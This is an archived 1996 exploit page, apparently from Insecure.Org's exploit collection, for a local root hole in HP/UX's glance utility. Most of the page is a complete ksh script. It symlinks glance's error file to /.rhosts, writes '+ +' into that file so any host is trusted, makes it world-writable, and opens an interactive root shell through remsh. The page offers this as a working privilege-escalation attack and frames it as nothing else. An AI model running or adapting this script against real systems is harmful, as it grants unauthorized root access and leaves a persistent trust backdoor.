HP/UX SOD glance bug

Summary
Description:symlink bug due to poor error file creation
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable /usr/perf/bin/glance , probably just 9.x
Date:October 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/bin/ksh
# exploit to work against the latest rev that I know of for glance+
# Tested on 9000/700.. Don't even know if it's available on 10.X
# You could've done this next week.  .traz

if [ ! -x /usr/perf/bin/glance ]
then
  echo 'No diablo programme.'
  echo 'Que si como es que.'
  exit
fi

PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
echo 'Please wait for about 10 seconds, or somewhere around that, anyway.'
sleep 3
cp /.rhosts /tmp/rhosts-save
ln -s /.rhosts ~/glance.err
glance -j 1 -f ';><:/?*&^${KILLME}' -iterations 1 -maxpages 1
echo '+ +' > /.rhosts
if [ -f /tmp/rhosts-save ]
then
  cat /tmp/rhosts-save >> /.rhosts
  rm /tmp/rhosts-save
fi
#rm ~/glance.err # This goes away?  Why does this go away?
chmod 666 /.rhosts
chown root /.rhosts
remsh localhost -l root /bin/ksh -i


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]